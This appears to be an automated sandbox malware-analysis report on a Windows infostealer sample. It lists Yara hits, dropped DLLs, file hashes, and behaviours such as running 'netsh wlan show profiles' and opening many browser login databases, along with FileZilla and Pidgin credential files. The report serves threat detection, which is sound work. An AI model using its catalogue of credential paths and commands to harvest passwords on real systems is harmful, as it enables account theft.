Source: Yara match	File source: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1944154808.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED

Tries to harvest and steal WLAN passwords

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\System32\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\System32\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\System32\oobe\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SysWOW64\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files (x86)\rpoxldIfutSmyWjJrKGUzQXqIbavYDpyIXciZSXTNiYVRuumgNVVmwgBnyWNY\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Temp\00c07260dc\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\.purple\accounts.xml	Jump to behavior

Windows Analysis Report
wIaKimJFke.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

ID:	1417243
Product:	CloudBasic
Start time:	20:01:43
Start date:	28.03.2024
Sample:	wIaKimJFke.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	79fbd35cae4148d9053cd4590b6d41c0
SHA1:	3548d8fa1f242206447224068c16ffd30278ede3
SHA256:	9c1751ba73fe53ed9385f24750212c6e785843e4c63dbafec8f95d3e6a5088ef
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	92FBDFCCF6A63ACEF2743631D16652A7	971968B1378DD89D59D7F84BF92F16FC68664506	B4588FEACC183CD5A089F9BB950827B75DF04BD5A6E67C95FF258E4A34AA0D72
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	2AFDBE3B99A4736083066A13E4B5D11A	4D4856CF02B3123AC16E63D4A448CDBCB1633546	8D31B39170909595B518B1A03E9EC950540FABD545ED14817CAC5C84B91599EE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	80431C8E41DDD0BB4C10AFAFA6A8D386	03B1AE4E67F7E151E2EED58A506BEA4AE777743F	A22FA42F0CDD8F2155573B4B1F261A596A83A662AC90BBB1F2E716FA8E842B35
C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	PE32 executable (GUI) Intel 80386, for MS Windows	79FBD35CAE4148D9053CD4590B6D41C0	3548D8FA1F242206447224068C16FFD30278EDE3	9C1751BA73FE53ED9385F24750212C6E785843E4C63DBAFEC8F95D3E6A5088EF
C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	83D547914EFC4C5F2710C666CFD43A73	7FF30CFADD3154FCEC2A9FFA2335298F8A27C612	C6EF1629C65ADC407CC1A0DCEF9D80FBC1F629A9D7A2E48045F69F79C5D20B68
C:\Users\user\AppData\Local\Temp\_Files_\AIXACVYBSB.docx	ASCII text, with very long lines (1024), with CRLF line terminators	4E32787C3D6F915D3CB360878174E142	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
C:\Users\user\AppData\Local\Temp\_Files_\AIXACVYBSB.xlsx	ASCII text, with very long lines (1024), with CRLF line terminators	4E32787C3D6F915D3CB360878174E142	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
C:\Users\user\AppData\Local\Temp\_Files_\DTBZGIOOSO.docx	ASCII text, with very long lines (1024), with CRLF line terminators	159C7BA9D193731A3AAE589183A63B3F	81FDFC9C96C5B4F9C7730127B166B778092F114A	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
C:\Users\user\AppData\Local\Temp\_Files_\KATAXZVCPS.xlsx	ASCII text, with very long lines (1024), with CRLF line terminators	A0DC32426FC8BF469784A49B3D092ADC	0C0EEB9B226B1B19A509D9864F8ADC521BF18350	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
C:\Users\user\AppData\Local\Temp\_Files_\NHPKIZUUSG.docx	ASCII text, with very long lines (1024), with CRLF line terminators	8C1F71001ABC7FCE68B3F15299553CE7	382285FB69081EB79C936BC4E1BFFC9D4697D881	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
C:\Users\user\AppData\Local\Temp\_Files_\VLZDGUKUTZ.xlsx	ASCII text, with very long lines (1024), with CRLF line terminators	520219000D5681B63804A2D138617B27	2C7827C354FD7A58FB662266B7E3008AFB42C567	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
C:\Users\user\AppData\Local\Temp\_Files_\XZXHAVGRAG.docx	ASCII text, with very long lines (1024), with CRLF line terminators	A4E170A8033E4DAE501B5FD3D8AC2B74	589F92029C10058A7B281AA9F2BBFA8C822B5767	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
C:\Users\user\AppData\Local\Temp\_Files_\XZXHAVGRAG.xlsx	ASCII text, with very long lines (1024), with CRLF line terminators	A4E170A8033E4DAE501B5FD3D8AC2B74	589F92029C10058A7B281AA9F2BBFA8C822B5767	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xnwzpq5.2iu.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cipsawgy.e15.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_renydpxy.mj4.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vmy1tnrq.lsz.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	2AFDBE3B99A4736083066A13E4B5D11A	4D4856CF02B3123AC16E63D4A448CDBCB1633546	8D31B39170909595B518B1A03E9EC950540FABD545ED14817CAC5C84B91599EE
C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	92FBDFCCF6A63ACEF2743631D16652A7	971968B1378DD89D59D7F84BF92F16FC68664506	B4588FEACC183CD5A089F9BB950827B75DF04BD5A6E67C95FF258E4A34AA0D72
C:\Windows\Tasks\explorgu.job	data	553B3F36277BCABA37BEC01535475B4C	56D89F20004C061C804431F72DDDF6C8DC5E5C9A	0BBC66D6EFB396D0B0E2B6D00A863E86FB2BDA4861D8FE7126AFF7044D4505A5

Windows Analysis Report wIaKimJFke.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
wIaKimJFke.exe

Malware Threat Intel
Provided by